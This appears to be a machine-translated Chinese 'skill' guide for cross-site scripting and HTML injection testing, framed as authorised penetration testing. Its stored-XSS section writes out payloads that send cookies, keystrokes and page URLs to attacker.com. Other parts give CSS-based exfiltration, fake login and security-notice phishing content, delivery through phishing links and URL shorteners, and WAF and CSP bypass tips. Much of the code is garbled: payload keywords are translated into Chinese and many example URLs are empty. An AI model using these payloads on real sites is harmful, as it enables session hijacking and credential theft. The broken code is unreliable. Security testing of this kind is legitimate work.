# 跨站脚本和 HTML 注入测试 ## 目的对 Web 应用程序执行全面的客户端注入漏洞评估，以识别 XSS 和 HTML 注入缺陷，演示会话劫持和凭证盗窃的利用技术，并验证输入清理和输出编码机制。此技能可以跨存储、反射和基于 DOM 的攻击向量进行系统检测和利用。 ## 输入/先决条件 ### 所需访问权限 * 带有用户输入字段的目标 Web 应用程序 URL * Burp Suite或浏览器开发工具用于请求分析 * 可以为存储的 XSS 测试创建测试帐户 * 启用 JavaScript 控制台的浏览器 ### 技术要求 * 了解浏览器上下文中的 JavaScript 执行 * HTML DOM 结构和操作的知识 * 熟悉HTTP请求/响应头 * 了解cookie属性和会话管理 ### 法律先决条件 * 安全测试的书面授权 * 定义范围，包括目标领域和功能 * 处理任何捕获的会话数据的协议 * 建立事件响应程序 ## 输出/可交付成果 * XSS/HTMLi 漏洞报告及严重程度分类 * 概念验证有效负载展示影响 * 会话劫持演示（受控环境） * 针对 CSP 配置的修复建议 ## 核心工作流程 ### 第 1 阶段：漏洞检测 #### 识别输入反射点找到用户输入反映在响应中的区域： # 常见的注入向量 - 搜索框和查询参数 - 用户个人资料字段（姓名、简介、评论） - URL 片段和哈希值 - 显示用户输入的错误消息 - 仅具有客户端验证的表单字段 - 隐藏表单字段和参数 - HTTP 标头（用户代理、Referer） #### 基本检测测试插入测试字符串以观察应用程序行为： <测试123> <脚本>警报（'XSS'）

监控： * 未经编码的原始 HTML 反射 * 部分编码（一些字符转义） * JavaScript在浏览器控制台中执行 * DOM 修改在检查器中可见 #### 确定 XSS 类型 **存储的 XSS 指标：** * 页面刷新后输入仍然存在 * 其他用户看到注入的内容 * 存储在数据库/文件系统中的内容 **反映的 XSS 指标：** * 输入仅出现在当前响应中 * 要求受害者点击精心设计的 URL * 跨会话没有持久性 **基于 DOM 的 XSS 指标：** * 由客户端 JavaScript 处理的输入 * 服务器响应不包含负载 * 漏洞利用完全发生在浏览器中 ### 第 2 阶段：存储型 XSS 攻击 #### 确定存储位置具有持久用户内容的目标区域： - 评论部分和论坛 - 用户个人资料字段（显示名称、个人简介、位置） - 产品评论和评级 - 私人消息和聊天系统 - 文件上传元数据（文件名、描述） - 配置设置和首选项 #### 制作持久有效负载 <脚本> document.location='http://attacker.com/steal?c='+document.cookie <脚本> document.onkeypress=函数(e){ new Image().src='http://attacker.com/log?k='+e.key; } <脚本> fetch('http://attacker.com/capture',{ 方法：'POST'， body:JSON.stringify({cookies:document.cookie,url:location.href}) })

会话已过期 - 请登录

### 第 3 阶段：反射型 XSS 攻击 #### 构造恶意 URL 构建包含 XSS 负载的 URL： # 基本反射负载 https://target.com/search?q= # URL 编码的负载 https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E # 参数中的事件处理程序 https://target.com/page?name=">

# 基于片段（针对 DOM XSS） https://target.com/page# #### 交付方式向受害者传递反射型 XSS 的技术： 1. 带有精心设计的链接的网络钓鱼电子邮件 2. 社交媒体消息分发 3. URL 缩短器来掩盖有效负载 4. 编码恶意URL的二维码 5. 通过受信任域重定向链 ### 第 4 阶段：基于 DOM 的 XSS 攻击 #### 识别脆弱的接收器找到处理用户输入的 JavaScript 函数： // 危险的水槽文档.write() 文档.writeln() 元素.innerHTML 元素.outerHTML element.insertAdjacentHTML() 评估（）设置超时() 设置间隔() 函数() 位置.href 位置.分配() 位置.replace() #### 识别来源找到用户控制的数据进入应用程序的位置： // 用户可控源位置.hash 位置.搜索位置.href 文档.URL 文档.referrer 窗口名称发布消息数据本地存储/会话存储 #### DOM XSS 有效负载 // 基于哈希的注入 https://target.com/page#

// URL参数注入（客户端处理） https://target.com/page?default= // PostMessage利用 // 在攻击者页面上： <脚本> frames[0].postMessage('

','*'); ### 第 5 阶段：HTML 注入技术 #### 反射 HTML 注入无需 JavaScript 即可修改页面外观：

网站被黑

<按钮>提交 <风格> 输入[value^="a"]{背景:url(http://attacker.com/a)} 输入[value^="b"]{背景:url(http://attacker.com/b)} #### 存储的 HTML 注入持久的内容操纵：重要安全通知：您的帐户已被盗用！

此处存在虚假登录表单或误导性内容

### 第 6 阶段：过滤器旁路技术 #### 标签和属性变体

<脚本>警报(1)"> #### 编码绕过

<脚本>\u0061lert(1)

#### JavaScript 混淆 // 字符串连接 // 模板文字 <脚本>警报`1` // 构造函数执行 // Base64编码 <脚本>评估（atob（'YWxlcnQoMSk ='）） // 不带括号 <脚本>警报`1` #### 空格和注释绕过

<脚本>/**/警报(1)/**/

## 快速参考 ### XSS 检测清单 1.插入→检查执行情况 2. 插入

→ 检查事件处理程序 3.插入"> → 测试属性转义 4. 插入 javascript:alert(1) → 测试 href/src 属性 5. 检查 URL 哈希处理 → DOM XSS 潜力 ### 常见的 XSS 负载背景 |有效载荷 ---|--- HTML 正文 | `<脚本>警报(1)` HTML 属性 | `"><脚本>警报(1)` JavaScript 字符串 | `';警报(1)//` JavaScript 模板 | `${警报(1)}` URL 属性 | `javascript:警报(1)` CSS 上下文 | `` SVG 上下文 | `

**结果**：脚本完全在客户端执行；有效负载永远不会接触服务器。 ### 示例 4：通过 JSONP 端点绕过 CSP **场景**：站点具有 CSP 但允许受信任的 CDN **CSP 标头**：内容安全策略： script-src 'self' https://cdn.trusted.com **绕过**：在受信任域上查找 JSONP 端点： **结果**：使用允许的脚本源绕过 CSP。 ## 故障排除问题 |解决方案 ---|--- 脚本未执行 |检查CSP阻塞；验证编码；尝试事件处理程序（img、svg onerror）；确认JS已启用有效负载出现但不执行 |使用 `"` 或 `'` 打破属性上下文；检查注释内是否存在；测试不同的上下文无法访问 Cookie |检查 HttpOnly 标志；尝试本地存储/会话存储；使用 no-cors 模式 CSP 阻止有效负载 |在白名单域上查找 JSONP；检查不安全内联；测试base-uri绕过 WAF 阻止请求 |使用编码变体；片段有效负载；空字节；案例变化 ## 何时使用此技能适用于执行概述中描述的工作流程或操作。

Xss Html 注入

包含技能